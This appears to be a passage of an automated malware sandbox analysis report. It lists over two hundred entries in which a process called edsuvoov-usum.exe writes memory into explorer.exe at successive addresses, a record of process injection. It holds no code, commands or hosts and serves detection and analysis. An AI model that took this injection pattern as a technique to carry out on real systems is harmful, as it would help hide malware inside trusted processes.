Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9340000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E9E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E9F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EA00000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EA10000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EA20000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EA30000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EA40000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EA50000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EA60000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EA70000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EA80000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EA90000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EAA0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EAB0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EAC0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EAD0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EAE0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EAF0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EB00000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EB10000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EB20000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EB30000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EB40000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EB50000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EB60000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EB70000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EB80000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EB90000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EBA0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EBB0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EBC0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EBD0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EBE0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EBF0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EC00000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EC10000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EC20000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EC30000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EC40000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EC50000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EC60000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EC70000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EC80000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EC90000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ECA0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ECB0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ECC0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ECD0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ECE0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ECF0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ED00000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ED10000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ED20000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ED30000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ED40000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ED50000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ED60000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ED70000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ED80000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ED90000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EDA0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EDE0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EDF0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FEC0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FED0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FEE0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FEF0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FF00000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FF10000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FF20000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FF30000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FF40000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FF50000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FF60000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FF70000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FF80000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FF90000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FFA0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FFB0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FFC0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FFD0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FFE0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: FFF0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10000000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10010000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10020000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10030000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10040000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10050000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10060000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10070000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10080000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10090000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 100A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 100B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 100C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 100D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 100E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 100F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10100000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10110000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10120000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10130000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10140000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10150000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10160000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10170000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10180000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10190000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 101A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 101B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 101C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 101D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 101E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 101F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10200000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10210000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10220000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10230000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10240000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10250000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10260000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10270000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10280000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10290000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 102A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 102B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 102C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 102D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 102E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 102F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10300000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10310000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10320000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10330000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10340000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10350000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10360000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10370000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10380000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10390000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 103A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 103B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 103C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 103D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 103E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 103F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10400000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10410000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10420000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10430000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10440000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10450000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10460000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10470000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10480000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10490000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 104A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 104B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 104C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 104D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 104E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 104F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10500000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10510000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10520000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10530000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10540000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10550000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10560000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10570000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10580000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10590000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 105A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 105B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 105C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 105D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 105E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 105F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10600000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10610000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10620000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10630000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10640000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10650000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10660000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10670000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10680000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10690000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 106A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 106B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 106C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 106D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 106E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 106F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10700000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10710000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10720000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10730000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10740000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10750000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10760000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10770000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10780000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10790000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 107A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 107B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 107C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 107D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 107E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 107F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10800000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10810000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10820000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10830000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10840000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10850000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10860000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10870000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10880000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10890000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 108A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 108B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 108C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 108D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 108E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 108F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10900000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10910000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10920000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10930000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10940000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10950000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10960000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10970000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10980000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10990000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 109A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 109B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 109C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 109D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 109E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 109F0000Jump to behavior
